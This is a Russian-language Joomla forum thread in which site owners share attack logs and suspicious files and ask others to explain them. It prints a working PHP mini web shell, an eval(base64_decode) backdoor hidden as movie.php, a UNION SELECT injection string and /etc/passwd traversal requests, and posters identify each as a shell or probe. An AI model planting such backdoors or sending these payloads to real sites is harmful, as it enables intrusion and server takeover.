0 Пользователей и 1 Гость просматривают эту тему.
  • 678 Ответов
  • 243999 Просмотров
*

Rex_One

  • Захожу иногда
  • 453
  • 37 / 0
Пытаюстся ломануть (наверное боты) но пока безуспешно.
Скрин.
http://prntscr.com/1513yc

что пытаются сделать?!


p.s. Вареза на сайте нет.
Кривизна рук не компенсирует прямизну извилин.
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
Пытаюстся ломануть (наверное боты) но пока безуспешно.
что пытаются сделать?!
ищут наверное на какой системе сайт? запросы даже не джумловские)))
ничо не делать, ждать своего часа))) IP на всяк случай забанить в htaccess, но они каждый день новые)))
UPD. кстати мысля возникла, есть же сервисы по определению установленной CMS, мож они тут тоже долю свою добавляют?))) кому-то просто ваш сайт понравился и хочет узнать, на чем сделан, чтобы себе тоже такой же сделать?)) бред конечно, жаараа)))
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

xpyct

  • Захожу иногда
  • 62
  • 0 / 0
Что хотели этим сказать?
Толи загрузить шел толи запустить, вообщем не понятно куда или откуда :(
Код
echo "v0pCr3w<br>";
echo "sys:".php_uname()."<br>";
$cmd="echo nob0dyCr3w";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
и вдогонку, что значит (это лог от jhackguard)
Спойлер
[свернуть]
« Последнее редактирование: 17.05.2013, 10:39:26 от xpyct »
*

lifter

  • Осваиваюсь на форуме
  • 39
  • 6 / 0
боты не на шутку разбушевались, за сутки пришло 6 логов с попытками взлома, буду проверять сайты на предмет взлома.
Цитировать
* Union Select [GET:user_id] => -66 union select 1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_name='CHARACTER_SETS' -- ;
** Union Select [REQUEST:user_id] => -66 union select 1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_name='CHARACTER_SETS' -- ;

**PAGE / SERVER INFO


*REMOTE_ADDR :
118.173.73.148

*HTTP_USER_AGENT :
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;

*REQUEST_METHOD :
GET

*QUERY_STRING :
view=videos&type=member&user_id=-66+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+where+table_name='CHARACTER_SETS'%20--%20;&option=com_mytube



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[view] => videos
 -[type] => member
 -[user_id] => -66 union select 1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_name='CHARACTER_SETS' -- ;
 -[option] => com_mytube


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[view] => videos
 -[type] => member
 -[user_id] => -66 union select 1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_name='CHARACTER_SETS' -- ;
 -[option] => com_mytube

Цитировать
* Local File Inclusion [GET:phocaslideshow] => ../../../../../../../../../../../etc/passwd .jpg
** Local File Inclusion [REQUEST:phocaslideshow] => ../../../../../../../../../../../etc/passwd .jpg

**PAGE / SERVER INFO


*REMOTE_ADDR :
178.124.167.9

*HTTP_USER_AGENT :
Opera/9.80 (Windows NT 6.1; U; MRA 5.10 (build 5231); ru) Presto/2.9.168 Version/11.50

*REQUEST_METHOD :
GET

*QUERY_STRING :
phocaslideshow=../../../../../../../../../../../etc/passwd%00.jpg



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[phocaslideshow] => ../../../../../../../../../../../etc/passwd .jpg


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[phocaslideshow] => ../../../../../../../../../../../etc/passwd .jpg

Цитировать
* Local File Inclusion [GET:phocadownload] => ../../../../../../../../../../../etc/passwd .jpg
** Local File Inclusion [REQUEST:phocadownload] => ../../../../../../../../../../../etc/passwd .jpg

**PAGE / SERVER INFO


*REMOTE_ADDR :
178.124.167.9

*HTTP_USER_AGENT :
Opera/9.80 (Windows NT 6.1; U; MRA 5.10 (build 5231); ru) Presto/2.9.168 Version/11.50

*REQUEST_METHOD :
GET

*QUERY_STRING :
phocadownload=../../../../../../../../../../../etc/passwd%00.jpg



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[phocadownload] => ../../../../../../../../../../../etc/passwd .jpg


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[phocadownload] => ../../../../../../../../../../../etc/passwd .jpg
*

rosalin

  • Захожу иногда
  • 68
  • 0 / 0
ребята как проверить работает ли Marco's SQL Injection, до этого использовал jHackGuard, тот переодически писал лог, но хочеться получать лог по почте поэтому включил Marco's SQL Injection. но писем не получаю... ((
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Что хотели этим сказать?
Толи загрузить шел толи запустить, вообщем не понятно куда или откуда :(
Код
echo "v0pCr3w<br>";
echo "sys:".php_uname()."<br>";
$cmd="echo nob0dyCr3w";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}


Это мини PHP шелл использующий систеные функции сервера, вообще тоже самое что и командная строка!
*

ghio

  • Захожу иногда
  • 102
  • 0 / 0
Подскажите, что может быть: поставила jhackguard 3 мая, с того времени каждый день вот такая штука.

Спойлер
[свернуть]

Но больше всего настораживает вот этот кусок
Спойлер
[свернуть]

После этого все сайты и админки на хостинге стали выдавать ошибку 500...
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
Народ подскажите, по логам,

почти ко всем сайтам на аккаунте такие логи
 
Спойлер
[свернуть]

Я правильно понимаю, что входили в админку? Меня смущает код 200)
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Установи для твоей версии плагин oseSecure. И настрой вход в админку по секретному слову.
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
Установи для твоей версии плагин oseSecure. И настрой вход в админку по секретному слову.

ДА, это уже сейчас в процессе))) Просто хотел понять действительно ли поимели доступ к админкам или нет. Логи приходитьс анализировать первый раз, поэтому не сильно шарю
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
код 200 это означает что страница доступна, но не значит что в админку попали, по ответу 200 вывод такой не делается
шпаргалка
читаем и учим
*

Valenty

  • Новичок
  • 1
  • 0 / 0
Подскажите, пожалуйста, что делать
Спойлер
[свернуть]
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Получил сегодня по одному из сайтов:
Спойлер
[свернуть]
Я так понимаю, просто проверяют наличие самого шела? (Данного файла на сервере не нашел...)
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

SDKiller

  • Живу я здесь
  • 2706
  • 329 / 5
  • ...ergo sum
Данного файла на сервере не нашел...

Если не нашёл - ещё не значит что его не было, файл мог удалить сам себя.
*

ELLE

  • Глобальный модератор
  • 4510
  • 893 / 0
угу, подтверждаю...они сначала заливают один, с помощью которого в любую директорию запихиваю вирусню (или производят иные действия), а этот (имею в виду не конкретно pst.php, а вообще. в моем случае это был index.php) первый потом просто самоуничтожается...

ну, а могли и просто простукивать
« Последнее редактирование: 09.06.2013, 01:35:12 от ELLE »
*

ArtTeam

  • Захожу иногда
  • 186
  • 0 / 0
jHackGuard
подскажите что єто значит
Спойлер
[свернуть]
*

an0ther

  • Осваиваюсь на форуме
  • 34
  • 9 / 1
Понравилась вот такая попытка постучаться на сайт:
Цитировать
46.61.6.174 | 14:54:19 10.06.2013 | /adguard-ajax-crossdomain-hack/images/helper_top_background
IP  в черный список, конечно, но интересно это что за скрипт такой искали?
*

Vivit

  • Новичок
  • 2
  • 0 / 0
Доброго дня!

Вот такой вопрос, захожу на сайт -  ошибка, в админку,  а там:
 
Strict Standards: Non-static method JLoader::import() should not be called statically in /home/u129442/vivitsu/www/libraries/joomla/import.php on line 29 Strict Standards: Non-static method JLoader:

и так далее на нескольких страницах, это...  что и как с этим бороться...

написала в тех. поддержку а они...

Восстановили файлы сайта из резервной копии от 14 мая. Однако данная операция не позволила восстановить работоспособность сайта. На сколько можно понять, в файл /vivitsu/www/templates/rt_refraction_j15/index.php 21 апреля был внедрен вредоносный код.

Резервные копии хранятся только две недели и резервных копий ранее 14 мая не сохранилось. В данном случае вам необходимо восстановить работоспособность сайта самостоятельно или с привлечением сторонних компетентных специалистов.

может кто возьмется восстановить, я  проф... т.е.  полный профан 
   
*

Go-destroy

  • Захожу иногда
  • 221
  • 4 / 1
кто подскажет что за дрянь нашел у заказчика под видом  movie.php

Цитировать
<?php
if(@md5($_POST["gif"]) === "320648220d6bd8b8e51ec3b6d6dd8898") {
eval (base64_decode($_POST["php"]));
exit;
}
?>
*

an0ther

  • Осваиваюсь на форуме
  • 34
  • 9 / 1
кто подскажет что за дрянь нашел у заказчика под видом  movie.php
Видимо процесс следующий:
скрипт выполняет проверку - если контрольная сумма MD5 параметра "gif"  POST-запроса  равна указанной цифре, то декодировать содержимое параметра "php" POST-запроса и выполнить.
Как то так.

 Это - shell
« Последнее редактирование: 14.06.2013, 23:23:17 от an0ther »
*

an0ther

  • Осваиваюсь на форуме
  • 34
  • 9 / 1
Кто скажет, что за уязвимость искали:
Спойлер
[свернуть]
?
« Последнее редактирование: 17.06.2013, 22:33:40 от an0ther »
*

Vivit

  • Новичок
  • 2
  • 0 / 0
wishlight у меня скайп - Спам... я все снесла...  напишите мне на почту через мой сайт... спасибо.
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Ребят, эта ведь "бяка"? Мне стоит ее прихлопнуть? Я с JS что то не очень, но eval меня сразу смутил... :'(

Спойлер
[свернуть]
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

SDKiller

  • Живу я здесь
  • 2706
  • 329 / 5
  • ...ergo sum
Мне стоит ее прихлопнуть?

Конечно стоит - нафига он такой древний, да ещё и в пакере?
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Конечно стоит - нафига он такой древний, да ещё и в пакере?
Ну это не моя прихоть =) Шаблон старый для Joomla 1.5 от JoomlaBamboo, да и сам файл не используется в шаблоне, просто я все файлы "шерстю" после чистки сайта от вирусов...
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

SDKiller

  • Живу я здесь
  • 2706
  • 329 / 5
  • ...ergo sum
Ну кстати в пакер мало ли что могли напихать. Возьми уж официальный minified
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 329
Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 1151
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 1297
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 483
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 1080
Последний ответ 03.11.2020, 17:36:03
от Cedars